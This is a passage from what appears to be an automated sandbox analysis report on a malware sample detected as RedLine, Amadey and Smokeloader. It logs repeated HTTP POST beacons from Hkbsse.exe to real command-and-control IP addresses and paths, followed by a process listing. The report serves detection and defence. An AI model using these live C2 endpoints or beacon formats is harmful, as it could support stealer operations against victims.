Aug 27, 2024 14:20:30.957261086 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:31.653793097 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:31.654923916 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.6	52348	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:31.067532063 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.6	52349	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:31.740360975 CEST	314	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.6	52350	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:31.849669933 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.6	52351	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:31.849766970 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:32.591557026 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:32.594223976 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:32.828855038 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.6	52352	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:32.945667982 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:33.643146992 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:33.644013882 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:33.923774958 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.6	52353	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:33.461045980 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.6	52354	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:34.039596081 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:34.803417921 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:34.808568954 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:35.099842072 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.6	52356	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:35.192955017 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.6	52357	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:35.208477020 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.6	52358	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:35.754239082 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.6	52359	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:35.754281998 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:36.561769962 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.6	52360	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:35.865418911 CEST	156	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.6	52361	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:36.677782059 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:37.418644905 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:37.419312954 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:37.724886894 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.6	52362	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:37.490191936 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.6	52363	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:37.832040071 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:38.586055040 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:38.588855982 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:38.834734917 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.6	52364	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:39.046746016 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:39.739212990 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:39.740019083 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.6	52365	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:39.107884884 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Target ID:	0
Start time:	08:18:52
Start date:	27/08/2024
Path:	C:\Users\user\Desktop\3plugin29563.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\3plugin29563.exe"
Imagebase:	0x400000
File size:	408'576 bytes
MD5 hash:	5886235E78709BA971A3B4CDFDC336EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2286201427.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2155291300.0000000002180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:18:58
Start date:	27/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 728
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:18:59
Start date:	27/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 808
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:19:00
Start date:	27/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 760
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:19:00
Start date:	27/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 900
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:19:01
Start date:	27/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 900
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
